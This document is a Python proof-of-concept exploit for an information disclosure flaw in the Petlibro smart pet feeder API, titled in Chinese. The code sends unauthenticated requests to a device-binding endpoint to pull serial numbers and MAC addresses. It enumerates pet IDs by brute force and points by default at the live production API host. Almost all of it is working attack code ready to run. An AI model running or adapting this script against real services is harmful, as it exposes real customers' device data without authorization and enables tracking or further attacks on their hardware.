CVE-2025-3654 Petlibro智能宠物喂食器信息泄露漏洞

import requests import json # CVE-2025-3654 PoC - Petlibro Smart Pet Feeder Information Disclosure # Target: Petlibro Smart Pet Feeder Platform <= 1.7.31 def exploit_cve_2025_3654(target_url, pet_id): """ Exploit for CVE-2025-3654 Information Disclosure via /api/device/devicePetRelation/getBoundDevices Args: target_url: Base URL of the Petlibro API server pet_id: Valid pet ID to query device information Returns: dict: Device information including serial numbers and MAC addresses """ endpoint = f"{target_url}/api/device/devicePetRelation/getBoundDevices" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Petlibro/1.7.31' } payload = { 'petId': pet_id } try: # Send unauthenticated request to leak device information response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Successfully retrieved device information for pet_id: {pet_id}") print(f"[+] Response: {json.dumps(data, indent=2)}") return data else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return None def enumerate_pet_ids(target_url, start_id=1, end_id=1000): """ Enumerate pet IDs to find valid IDs for exploitation """ print(f"[*] Enumerating pet IDs from {start_id} to {end_id}") for pet_id in range(start_id, end_id + 1): result = exploit_cve_2025_3654(target_url, str(pet_id)) if result and result.get('code') == 0: print(f"[+] Found valid pet_id: {pet_id}") return pet_id return None # Example usage if __name__ == "__main__": # Replace with actual target URL target = "https://api.petlibro.com" # Method 1: Direct exploitation with known pet_id print("=" * 50) print("CVE-2025-3654 PoC - Petlibro Information Disclosure") print("=" * 50) # Known pet ID pet_id = "123456" device_info = exploit_cve_2025_3654(target, pet_id) # Method 2: Enumerate pet IDs # valid_id = enumerate_pet_ids(target, 1, 10000)